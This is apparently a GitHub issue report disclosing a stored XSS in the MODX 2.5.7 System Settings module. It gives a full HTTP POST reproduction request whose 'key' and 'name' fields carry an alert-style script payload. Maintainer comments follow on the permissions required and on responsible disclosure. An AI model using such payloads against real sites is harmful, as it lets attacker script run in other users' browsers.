Revolution: Stored XSS in MODX 2.5.7 System Settings module
Summary
I found two stored XSS in MODX 2.5.7 System Settings module.The "key" and "name" parameters in the following request are vulnerable to XSS vulnerability. This malicious payload will be trigerred by every user, when they visit this module.
Step to reproduce
Example request, which creates new setting with malicious $key and malicious $name:
POST /modx-2.5.7-pl/connectors/index.php HTTP/1.1
Host: 127.0.0.1
Content-Length: 270
Origin: http://127.0.0.1
X-Requested-With: XMLHttpRequest
modAuth: modx597d630a8107d5.18150416_1597d68f9a890f6.90859363
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
Referer: http://127.0.0.1/modx-2.5.7-pl/manager/?a=system/settings
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8
Cookie: PHPSESSID=1d2mf5dn5k2hevhe34omti9f51
Connection: close
action=system%2Fsettings%2Fcreate&HTTP_MODAUTH=modx597d630a8107d5.18150416_1597d68f9a890f6.90859363&fk=0&key=%3C%2Fdiv%3E%3Cscg%20onload%3Dalert(%2Fxss%2F)%3E&name=%3C%2Fdiv%3E%3Cscg%20onload%3Dalert(%2Fxss%2F)%3E&description=&xtype=textfield&namespace=core&area=&value=
Observed behavior
A small popup will come up.
Environment
MODX 2.5.7, apache 2.4.23, mysql 5.7.15, php 5.6.24.
lemon666
All 4 comments
This would only be possible if you're logged in to the manager with correct permissions though wouldn't it?
muzzwood
on 1 Aug 2017
@lemon666 Please do not post security issues to the public tracker, instead responsibly disclose them to [email protected] so a fix can be prepared before details are shared publicly.
In this case, it's a rather harmless issue, as it requires the permission to edit settings before it can be exploited, but it appears that it's already in the NIST database before the security team was alerted properly. If it's a more serious vulnerability, that could cause panic when no patch is available but a CVE is going around on social media.
Mark-H
on 2 Aug 2017
@Mark-H Is this already fixed in some version? Could you link the commit IDs fixing this vulnerability, thanks. Bug item has been open for nearly a year now. Nothing found from ChangeLog with issue ID.
fgeek
on 14 Jul 2018
I think this may be #13887 but reported by someone else a little earlier. Another good reason not to report these in a public tracker ;)
Mark-H
on 14 Jul 2018
Related issues
sottwell
路
3Comments
Ruslan-Aleev
路
4Comments
travisbotello
路
3Comments
freelancewebdev
路
3Comments
gadgetto
路
4Comments
Most helpful comment
@lemon666 Please do not post security issues to the public tracker, instead responsibly disclose them to [email protected] so a fix can be prepared before details are shared publicly.
In this case, it's a rather harmless issue, as it requires the permission to edit settings before it can be exploited, but it appears that it's already in the NIST database before the security team was alerted properly. If it's a more serious vulnerability, that could cause panic when no patch is available but a CVE is going around on social media.